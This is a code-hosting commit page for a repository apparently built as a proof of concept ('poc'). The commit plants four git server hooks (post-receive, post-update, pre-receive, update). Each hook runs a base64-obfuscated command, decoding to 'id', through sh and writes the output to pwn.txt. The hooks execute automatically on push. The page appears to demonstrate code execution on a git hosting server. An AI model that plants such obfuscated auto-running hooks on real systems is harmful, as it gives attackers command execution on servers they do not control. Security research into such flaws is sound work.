This website works better with JavaScript
Página Principal
Explorar
Ajuda
Registe-se
Iniciar Sessão
pwn3011
/
w96f1
Vigiar
1
Colocar Estrela
0
Fork
0
Ficheiros
Problemas
0
Pull Requests
0
Wiki
Ver Fonte
poc
x
há 1 mês atrás
pai
57d71764a8
commit
0c00f5fa7d
4 ficheiros alterados
com
8 adições
e
0 exclusões
Visão Dividida
Mostrar Estatísticas Diff
2
0
n/r34fd.git/hooks/post-receive
2
0
n/r34fd.git/hooks/post-update
2
0
n/r34fd.git/hooks/pre-receive
2
0
n/r34fd.git/hooks/update
+ 2
- 0
n/r34fd.git/hooks/post-receive
Ver Ficheiro
@@ -0,0 +1,2 @@
+#!/bin/sh
+echo '$(echo 'aWQ=' | base64 -d | sh)' > pwn.txt
+ 2
- 0
n/r34fd.git/hooks/post-update
Ver Ficheiro
@@ -0,0 +1,2 @@
+#!/bin/sh
+echo '$(echo 'aWQ=' | base64 -d | sh)' > pwn.txt
+ 2
- 0
n/r34fd.git/hooks/pre-receive
Ver Ficheiro
@@ -0,0 +1,2 @@
+#!/bin/sh
+echo '$(echo 'aWQ=' | base64 -d | sh)' > pwn.txt
+ 2
- 0
n/r34fd.git/hooks/update
Ver Ficheiro
@@ -0,0 +1,2 @@
+#!/bin/sh
+echo '$(echo 'aWQ=' | base64 -d | sh)' > pwn.txt